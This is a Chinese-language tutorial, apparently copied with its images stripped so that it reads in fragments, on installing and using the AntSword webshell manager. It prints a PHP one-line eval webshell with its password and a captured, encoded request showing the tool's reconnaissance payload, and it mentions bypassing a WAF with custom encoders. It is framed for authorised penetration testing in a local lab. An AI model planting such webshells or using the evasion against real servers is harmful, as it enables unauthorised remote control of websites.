网安工具：中国蚁剑安装与使用教程

中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

中国蚁剑：

向中国菜刀致敬！中国蚁剑：一款跨平台的开源网站管理工具

github地址：

蚁剑源代码

蚁剑加载器

云盘下载：

密码:3adl

注意：在GitHub下载时需要下载两个部分，一个是项目核心源码（AntSword），另一个是加载器（AntSword-Loader）；加载器则分为三个版本：Mac、Windows、Linux。

安装教程：

两个全部解压好（一个是源码，一个是启动文件/加载器）

先打开AntSword-Loader-x64（加载器）文件夹里面的

然后重启软件就好了

?php@eval($_POST['1']);?

2.url填写

2.进行相应的配置

如下所示，是http包的相应的参数

POST//1.1Host:192.168.93.129:80Accept-Encoding:gzip,deflateUser-Agent:antSword/:application/x-www-form-urlencodedContent-Length:983Connection:close1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob__clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示，如果需要添加请求行的参数，或者是POST传递的参数，该如何搞了：

在添加数据下有请求信息配置，如何配置如上所示：如下是其他配置：

设置不同的编码器和解码器可以绕过waf，如下所示：

我的服务器地址是192.168.93.134（本地服务器），所以我在根目录下面创建了文件，文件中的内容如下所示：

?php@eval($_POST['1']);?

类容是一句话木马，连接密码是1.

开启安全狗